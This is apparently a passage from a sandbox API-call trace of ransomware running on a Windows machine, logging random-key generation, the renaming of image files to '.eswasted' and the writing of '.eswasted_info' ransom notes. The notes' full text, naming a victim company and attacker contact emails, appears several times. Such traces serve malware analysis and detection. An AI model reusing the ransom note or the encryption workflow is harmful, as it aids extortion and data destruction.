"c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\kv0kema.gif.eswasted")) returned 1 [0081.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\Kv0KEma.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\kv0kema.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.265] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.266] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.267] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.267] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.268] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.268] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.268] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.293] SetEndOfFile (hFile=0xfc) returned 1 [0081.319] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.319] CloseHandle (hObject=0xfc) returned 1 [0081.320] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0081.321] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.321] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.321] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\W8sZHhtTV.gif") returned 115 [0081.321] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f0) returned 0x4efe18 [0081.321] lstrcpyW (in: lpString1=0x4efefe, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.322] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.322] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.322] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.322] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\W8sZHhtTV.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\w8szhhttv.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.323] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.324] SetEndOfFile (hFile=0xfc) returned 1 [0081.324] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.324] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.324] lstrcpyW (in: lpString1=0x4efefe, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\W8sZHhtTV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\w8szhhttv.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\W8sZHhtTV.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\w8szhhttv.gif.eswasted")) returned 1 [0081.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\W8sZHhtTV.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\w8szhhttv.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.337] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.337] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xdd87 [0081.337] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdd87) returned 0xb10000 [0081.338] CloseHandle (hObject=0xf8) returned 1 [0081.342] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.343] CloseHandle (hObject=0x100) returned 1 [0081.343] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0081.343] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.345] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.345] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.345] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.345] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.345] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.405] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.405] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.405] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.405] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HvR4lgsHS6d5zHGM6XEKIVp/soASEkgnZxxAwnUEky3cVeatZRtE+jc+8XrD2zPx\r\nvOpUKZ4nN79HZfq93al1jonQRLdn6M9vYJCKh/XXTfOlGv9K+uATv3tHrO2+7TR+\r\nVIXthvRSHITvMuujRJTYWVorSNSRgv1EJn1YxwKo+uqUP9JaY1ZtTrkg8TZfbES5\r\nClzLgVEKogHyBTiIRZZad5vJycQwoOHUom2tODFcr4GSaWErKcZN4+OqoAukxIcs\r\nsFIZr6xjlHEJKMrXS+C8HWCV5etw2TuSwJSD9+PuQztqd9hXthT5cawFOm4un10n\r\nMT65Acr8omJGxcY3d80obqXwUFPGoW/XV5ev/mZnsaYc3jgKm4enaMfZg8AwhYEa\r\nt2ap4I3MugGxdVJQ8EG5BHSHiFGzLdkwOJXF5S99TrGZqJvxx0kJO6XCF7ZhEyLu\r\nwLBCRNt4/nhLZYnDcIbKUXNRTaquHldgAw2OlOhTUakG+PwdMJ+8gFbwC9r+BBYy\r\nE5RCgW0W3adrgND8WNAUoKier28loHO4u5bDZGdxgSsNitzvq2dkHW8Ba+rGptyK\r\n/+e3Zzuv6X0mM3UoaCreNUP41TuuEIjm+5r4DH1it9f3sAviNm4FBk9lIsLnB3Bf\r\n2/jWNAvd1rkIClzzJ5BZwJI86ccLPgnQp5cFydlp0jF=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.405] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.405] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.405] SetEndOfFile (hFile=0xfc) returned 1 [0081.408] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.408] CloseHandle (hObject=0xfc) returned 1 [0081.410] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.410] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50abe0 | out: hHeap=0x4a0000) returned 1 [0081.410] _aulldvrm () returned 0x0 [0081.410] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.411] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.411] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\X-dIzNFjhmqz2wLkOxi.bmp") returned 112 [0081.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ea) returned 0x4efe18 [0081.411] lstrcpyW (in: lpString1=0x4efef8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.411] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.412] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.412] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\X-dIzNFjhmqz2wLkOxi.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\x-diznfjhmqz2wlkoxi.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.413] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.415] SetEndOfFile (hFile=0xfc) returned 1 [0081.415] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.415] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.415] lstrcpyW (in: lpString1=0x4efef8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\X-dIzNFjhmqz2wLkOxi.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\x-diznfjhmqz2wlkoxi.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\X-dIzNFjhmqz2wLkOxi.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\x-diznfjhmqz2wlkoxi.bmp.eswasted")) returned 1 [0081.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\X-dIzNFjhmqz2wLkOxi.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\x-diznfjhmqz2wlkoxi.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.416] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.416] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x11c23 [0081.416] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11c23) returned 0xb10000 [0081.416] CloseHandle (hObject=0x100) returned 1 [0081.422] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.423] CloseHandle (hObject=0x118) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0081.423] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.424] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.424] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.424] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.425] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.425] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.435] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.435] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.435] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.435] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]UY6drzoq7qWctB49wTGfVdvUTLD3+0g7pXwFtIGCv6ajxkJr6SCk8PsWCpTaMRQT\r\n72sULcYdg46laPqRI3xlIGsgbjUD7TFCqDCMWjAEP2rqyvDOT8QITEL9E1nuFw0R\r\ng+xz+OvVn+lUaKZYW2r2lbJa+ZVHgrUFloHIuvzQ0VZ2R8heKo0Avrxn4g3dSR5V\r\nkhmuMOSjSGJjTwlUf6DkfJLYh1Mbc6XVRCqsCwStLFeBPKGRJt7pmrSNfuy9zE2w\r\ntIUKbp+GX6jCQVgIOnSD0uk2R8llxmr/TJbiAhBPNv+5kAUKuQgr+AI2sjaHOOUX\r\nG/BvCtlHsXjVguCTUjrkmGRZxICiAJ0RaukXF+a6RAG7eZSCcSUHvSdsNo59sc/u\r\nWPWI8xN0CyQqRpIpWdETJBRSa95V1PW3haQvwRAF09L36iik8FpbjlJqgkAJvGQf\r\nEd3N0XNpDeQR466vfMaZPq32CE/mc4mDjK6Pkr+oyvp/sh9Di7f9bG4rN9KTKZR9\r\nTpqIENOpEju3S+RoW/TOkrfNrpt+tlPguQvlnwhobxiMpkkq4gON0ZvO7/ifmi5V\r\nZrit6lz9/SS5ofkr+i6bxMEoUCtrHibT/y7VCcCwEae0YgnVgaf0C9DYaCriaha1\r\nEVdqZ+gmgNR5xvzCuR1I29ONUUwTfcw7Ytx0ru29Uq+=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.435] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.435] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.435] SetEndOfFile (hFile=0xfc) returned 1 [0081.438] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.438] CloseHandle (hObject=0xfc) returned 1 [0081.440] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.440] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50ae60 | out: hHeap=0x4a0000) returned 1 [0081.440] _aulldvrm () returned 0x0 [0081.440] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.441] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.441] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.441] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\xhdJfgkz.bmp") returned 101 [0081.441] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2d4) returned 0x4efe18 [0081.441] lstrcpyW (in: lpString1=0x4efee2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.441] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.441] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.442] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.442] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\xhdJfgkz.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\xhdjfgkz.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.443] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.498] SetEndOfFile (hFile=0xfc) returned 1 [0081.498] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.498] lstrcpyW (in: lpString1=0x4efee2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\xhdJfgkz.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\xhdjfgkz.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\xhdJfgkz.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\xhdjfgkz.bmp.eswasted")) returned 1 [0081.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\xhdJfgkz.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\xhdjfgkz.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.499] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.499] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x16ece [0081.499] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16ece) returned 0xb10000 [0081.499] CloseHandle (hObject=0x118) returned 1 [0081.504] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.505] CloseHandle (hObject=0x100) returned 1 [0081.505] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef648 [0081.505] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.506] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef690 | out: pbBuffer=0x4ef690) returned 1 [0081.506] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.506] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.507] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.507] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.515] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.515] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0081.515] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.515] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: 